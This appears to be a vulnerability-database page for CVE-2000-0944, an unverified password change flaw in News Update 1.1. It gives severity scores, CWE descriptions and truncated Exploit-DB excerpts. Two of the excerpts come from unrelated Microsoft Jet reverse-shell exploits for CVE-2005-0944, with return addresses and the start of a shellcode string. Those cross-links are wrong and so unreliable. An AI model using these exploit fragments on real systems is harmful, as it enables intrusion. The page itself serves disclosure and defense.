CVE-2000-0944
published 2000-12-19CVE-2000-0944: CGI Script Center News Update 1.1 does not properly validate the original news administration password during a password change operation, which allows remote…
PriorityP339critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
11.27%
95.4th percentile
CGI Script Center News Update 1.1 does not properly validate the original news administration password during a password change operation, which allows remote attackers to modify the password without knowing the original password.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cgi | script_center_news_update | — | — |
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
exploitdb·2005-04-22
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
---
##################################################################
# #
# Microsoft Jet (msjet40.dll) Reverse Shell Exploit #
# #
# #
# #
# #
# Based on the exploit written by S.Pearson and #
# Python version by coded by Tal zeltzer #
# #
# XP/sp2 fixed version by Jean Luc #
# #
##################################################################
import sys
import struct
# Addresses are compatible with Windows XP Service Pack 1 and Service Pack 2
# EIP = "\x47\xAD\x05\x30"; # Use this one for MSAccess 2003 (jmp edx)
EIP = "\xF7\x69\x05\x30"; # Use this one MSAccess 2002 (jmp edx)
# EIP = "\xFf\xf7\x07\x30"; # Use this one MSAccess 2000 (jmp edx)
# Reverse Connect Shellcode (From metasploit)
Shellcode_p1 = "\x3
Exploit-DB
Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
exploitdb·2005-04-11
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
---
/*
* --------------------------------------
*
* Microsoft Jet (msjet40.dll) Exploit
*
* --------------------------------------
*
* Author:
* ----------
* S.Pearson
* Computer Terrorism (UK)
* www.computerterrorism.com
* 11/04/2005
*
*
* Credits:
* ----------
* Hexview (original advisory)
*
*
* Tested on:
* -------------
* Windows 2000 SP4 (english)
* Windows XP SP0 (english)
* Windows XP SP1 (english)
*
*
* Requires:
* ------------
* MSAccess offset for stable jmp edx (could use others)
*
* 0x3005AD47 (Microsoft Access 2003)
* 0x300569F7 (Microsoft Access 2002) * DEFAULT *
* 0x3007F7FF (Microsoft Access 2000)
*
*
* Tech Overview:
* ------------------
* Simple exploit based upon Hexview's advisory
* released 01/04/2005.
*
Exploit-DB
News Update 1.1 - Change Admin Password
exploitdb·2000-11-15
CVE-2000-0944 News Update 1.1 - Change Admin Password
News Update 1.1 - Change Admin Password
---
/***************************************************************************
news_exp.c - description
begin : Sat Oct 21 2000
copyright : (C) 2000 by Morpheus[bd]
email : [email protected]
advisory : www.brightdarkness.de
Exploit code for the News Update 1.1 by Morpheus[bd]
For more information see my advisory which should be in this .tar.gz
package.
Compiling/Linking: gcc exploit.c -o exploit
Usage: will be printed when the exploit is started without arguments
***************************************************************************/
/***************************************************************************
[Disclaimer]
Standard disclaimer applies here. Do not use this program. This program
is only for educational purposes. Use it on
No writeups or analysis indexed.
CWE
Unverified Password Change
mitre_cwe·CVSS 9.8
[CRITICAL] CWE-620 Unverified Password Change
CWE-620: Unverified Password Change
When setting a new password for a user, the product does not require knowledge of the original password, or using another form of authentication.
This could be used by an attacker to change passwords for another user, thus gaining the privileges associated with that user.
Modes of Introduction:
Phase: Architecture and Design
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope: Access Control. Impact: Bypass Protection Mechanism, Gain Privileges or Assume Identity.
Potential Mitigations:
[Architecture and Design] When prompting for a password change, force the user to provide the original password in addition to the new password.
[Architecture and Desig
CWE
Insufficiently Protected Credentials
mitre_cwe
CWE-522 Insufficiently Protected Credentials
CWE-522: Insufficiently Protected Credentials
The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.
Modes of Introduction:
Phase: Architecture and Design
Note: COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic.
Phase: Implementation
Common Consequences:
Scope: Access Control. Impact: Gain Privileges or Assume Identity. An attacker could gain access to user accounts and access sensitive data used by the user accounts.
Detection Methods:
Automated Static Analysis: Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/com
http://archives.neohapsis.com/archives/bugtraq/2000-10/0402.htmlhttp://www.securityfocus.com/bid/1881https://exchange.xforce.ibmcloud.com/vulnerabilities/5433http://archives.neohapsis.com/archives/bugtraq/2000-10/0402.htmlhttp://www.securityfocus.com/bid/1881https://exchange.xforce.ibmcloud.com/vulnerabilities/5433
2000-12-19
Published